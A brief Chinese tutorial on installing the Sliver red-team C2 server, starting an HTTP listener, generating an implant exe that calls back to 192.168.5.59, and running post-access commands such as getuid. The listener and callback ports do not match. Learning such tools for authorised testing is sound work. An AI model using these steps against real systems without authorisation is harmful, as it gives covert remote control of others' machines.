简介:
Sliver 是一个基于Go的开源、跨平台的红队平台,可供各种规模的组织用于执行安全测试。
Sliver 的支持 C2 over Mutual-TLS、HTTP(S) 和 DNS等协议。
implant可以时时编译生成,并会使用证书进行加密。
服务器和客户端以及implant都支持MacOS、Windows 和 Linux。
源码地址:
https://github.com/BishopFox/sliver
根据不同的情况进行使用与下载
使用说明:
https://vk9-sec.com/how-to-set-up-use-c2-sliver/
下载服务端:
https://github.com/BishopFox/sliver/releases/tag/v1.5.31
下载完成后,解压
unzip sliver-server_linux.zip
解压完成后,将程序运行
这里我将程序修改名为了{sliver}
./sliver
创建完成后,开启一个简单的监听端口
{与kali开启监听相同}
http -l 8888
利用sliver生成一个监听模块,放到客户端进行运行,得到反弹信息
generate --http http://192.168.5.59:1234
得到后缀为exe的文件,这里我们直接在本地进行尝试与实验
大家也可以自我尝试
可以看到,生成的exe程序放到了默认文件下
拿到权限后可以执行一些操作等
sessions info getuid